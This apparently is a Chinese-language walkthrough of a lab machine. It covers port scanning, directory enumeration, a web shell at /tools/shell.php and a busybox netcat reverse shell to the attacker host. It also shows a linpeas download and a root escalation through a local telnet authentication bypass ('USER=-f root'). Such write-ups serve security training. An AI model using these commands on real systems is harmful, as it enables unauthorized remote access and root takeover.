┌──(root㉿Eecho)-[~] └─# rustscan -a 192.168.43.156 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- I don't always scan ports, but when I do, I prefer RustScan.
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.156:22 Open 192.168.43.156:80 Open 192.168.43.156:9090 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.156 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-20 14:55 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:55 Completed NSE at 14:55, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:55 Completed NSE at 14:55, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:55 Completed NSE at 14:55, 0.00s elapsed Initiating ARP Ping Scan at 14:55 Scanning 192.168.43.156 [1 port] Completed ARP Ping Scan at 14:55, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 14:55 Completed Parallel DNS resolution of 1 host. at 14:55, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 14:55 Scanning 192.168.43.156 [3 ports] Discovered open port 22/tcp on 192.168.43.156 Discovered open port 80/tcp on 192.168.43.156 Discovered open port 9090/tcp on 192.168.43.156 Completed SYN Stealth Scan at 14:55, 0.02s elapsed (3 total ports) Initiating Service scan at 14:55 Scanning 3 services on 192.168.43.156 Completed Service scan at 14:56, 52.15s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.43.156 Retrying OS detection (try #2) against 192.168.43.156 NSE: Script scanning 192.168.43.156. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:56 NSE Timing: About 99.77% done; ETC: 14:57 (0:00:00 remaining) Completed NSE at 14:57, 30.32s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:57 Completed NSE at 14:57, 1.21s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:57 Completed NSE at 14:57, 0.00s elapsed Nmap scan report for 192.168.43.156 Host is up, received arp-response (0.00056s latency). Scanned at 2026-05-20 14:55:47 CST for 87s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian)) |_http-server-header: Apache/2.4.66 (Debian) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-title: Warning 9090/tcp open ssl/http syn-ack ttl 64 Cockpit web service 323 or later | ssl-cert: Subject: commonName=LNNN/organizationName=c2d6d1b6c1084753b022ca80771b162d | Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost | Issuer: commonName=LNNN/organizationName=c2d6d1b6c1084753b022ca80771b162d | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2026-05-16T12:12:36 | Not valid after: 2027-06-15T12:12:36 | MD5: e4c5 15c9 7c72 4e30 2fc5 7730 8fc6 fc80 | SHA-1: 35c1 53ed ca78 45d4 93ac e679 5b54 c601 f83d f387 | SHA-256: f7b9 8338 2622 23ad c057 c185 9dd0 227c 1acf 27eb a20b b395 a2e6 ee90 5842 a927 | -----BEGIN CERTIFICATE----- | MIIDmDCCAoCgAwIBAgIUI9FC7bP/Gfoi6C2B6S+9pZTVDJwwDQYJKoZIhvcNAQEL | BQAwOjEpMCcGA1UECgwgYzJkNmQxYjZjMTA4NDc1M2IwMjJjYTgwNzcxYjE2MmQx | DTALBgNVBAMMBExOTk4wHhcNMjYwNTE2MTIxMjM2WhcNMjcwNjE1MTIxMjM2WjA6 | MSkwJwYDVQQKDCBjMmQ2ZDFiNmMxMDg0NzUzYjAyMmNhODA3NzFiMTYyZDENMAsG | A1UEAwwETE5OTjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMH+BONl | Y/guez5+WHp26VHDyL8minC39Uv3w5iOpUMmTlDFK7uF7JofsUF1XgOBu0ERkgXk | /aKs6vpe2zrSLXed+XkOyiv7VjffmJqp5gHSLUzlH9h5DX+50KQ7+HTJSti0JB5U | fgnuArOGGOa77taHGAOvAjzxNluKUGRpj4TJS3ZKrv2WqzN9k9vzYN2NGumUTj8X | I4QqfZ81kOpVateC4MZe5dZB1A5PA+zl58oxEZYISiJP36AWBBsVW3O+SUOaIZAH | 2V4LP55v57vOJNoLJPBySbpB18I6mV+7yOPYfOQBGxXnbToZyK+O1X/QKbjAGVG7 | QrJsmGAnUEryicMCAwEAAaOBlTCBkjAdBgNVHQ4EFgQU5QaMxFxcf24TavmqQYG6 | rqk7NoMwHwYDVR0jBBgwFoAU5QaMxFxcf24TavmqQYG6rqk7NoMwGgYDVR0RBBMw | EYcEfwAAAYIJbG9jYWxob3N0MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD | AgGuMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUAA4IBAQCRMdGU | v3md6ZO5G3o/K+j/hgq/23lQ1PfLEBiYDXmoPYdpw6uR0PICzZUKdAotXyyTBNgC | 0m/e8bWJlT4sz1c/8Xi3CgJEggy16pFa/oaIT/oWCA78NYVVbJ/BgS6mKA8enrWc | m+qeRkNzQRHo9swFWqWjZ7h2d8hDhFqlP8m4dFt7PjClvQS5uZbTHizJueA+Z76t | 9eSb0lrDNABhZcBiZbBVYUdfuRXzwpnMFWoac5xCmLtRbARToCQd2JPImUcpUqm2 | 6croSyg65GRQ3pMGSQicILX9nMAy0T97i/Fhzuy3smWekIJ2RnXFSnOt+S96JKf4 | IPkACdS2Y//ubTCA |_-----END CERTIFICATE----- |_ssl-date: TLS randomness does not represent time | http-methods: |_ Supported Methods: GET HEAD |_http-title: Loading... | http-robots.txt: 1 disallowed entry |_/ |_http-favicon: Unknown favicon MD5: 46E6AB653E747CB83F60FC5CF29155C8 MAC Address: 08:00:27:24:2A:34 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Android 5 - 10 (Linux 3.4 - 3.18) (93%), Linux 2.6.32 (93%), Google Chromecast or Roku TV (Linux 4.9) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 5.10 - 5.19 (93%), Nintendo Switch (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), OpenWrt 21.02 (Linux 5.4) (93%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.99%E=4%D=5/20%OT=22%CT=%CU=37346%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6A0D5B4A%P=x86_64-pc-linux-gnu) SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=21) SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%TS=21) OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11) WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88) ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=) T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.000 days (since Wed May 20 14:56:40 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.56 ms 192.168.43.156
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:57 Completed NSE at 14:57, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:57 Completed NSE at 14:57, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:57 Completed NSE at 14:57, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.88 seconds Raw packets sent: 48 (3.716KB) | Rcvd: 32 (2.660KB)
22 SSH
80 HTTP
9090 HTTP
目录扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
┌──(root㉿Eecho)-[~] └─# gobuster dir -u http://192.168.43.156/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md =============================================================== Gobuster v3.8.2 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.43.156/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8.2 [+] Extensions: txt,html,back,cgi,jpg,json,md,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== index.html (Status: 200) [Size: 849] tools (Status: 301) [Size: 356] [--> http://192.168.43.156/tools/]
/tools/下有个shell.php可以进行rce
反弹shell
1
busybox nc 192.168.43.6 7777 -e sh
提权
www -> lnnn
上传linpeas扫描信息
1 2 3 4 5 6 7 8 9 10 11 12 13
www-data@LNNN:/tmp$ wget http://192.168.43.6/linpeas.sh.1 --2026-05-20 03:01:24-- http://192.168.43.6/linpeas.sh.1 Connecting to 192.168.43.6:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1062554 (1.0M) [application/x-sh] Saving to: ‘linpeas.sh.1’
linpeas.sh.1 100%[=================================================>] 1.01M 2.77MB/s in 0.4s
www-data@LNNN:/var/backups$ su lnnn Password: lnnn@LNNN:/var/backups$ id uid=1000(lnnn) gid=1000(lnnn) groups=1000(lnnn),100(users) lnnn@LNNN:/var/backups$
lnnn -> root
查看当前运行的进程
1 2
ps aux ss -utnl
发现了一个socat在本地 23 端口创建一个仅限本机访问的 Telnet 服务器
同时还有一个23端口的telnet在监听
查看telnet服务器版本发现是2.4的
GNU Inetutils 1.9.3 - 2.7之间是有个CVE-2026-24061认证绕过漏洞的。可通过环境变量注入实现无需认证的root权限获取,所以可以使用这个CVE提权,因为可以看到是root运行的
lnnn@LNNN:/tmp/GNU-Inetutils-telnet-CVE-2026-24061-$ USER='-f root' telnet -a 127.0.0.1 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'.
Linux 7.0.8-1-liquorix-amd64 (LNNN) (pts/1)
root@LNNN:~# id uid=0(root) gid=0(root) groups=0(root) root@LNNN:~#
这台靶机并不需要按照常规的拿普通用户然后再到root。从www提权到root也是可行的
1 2 3 4 5 6 7 8 9 10
www-data@LNNN:/tmp/GNU-Inetutils-telnet-CVE-2026-24061-$ USER='-f root' telnet -a 127.0.0.1 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'.
Linux 7.0.8-1-liquorix-amd64 (LNNN) (pts/1)
root@LNNN:~# id uid=0(root) gid=0(root) groups=0(root) root@LNNN:~#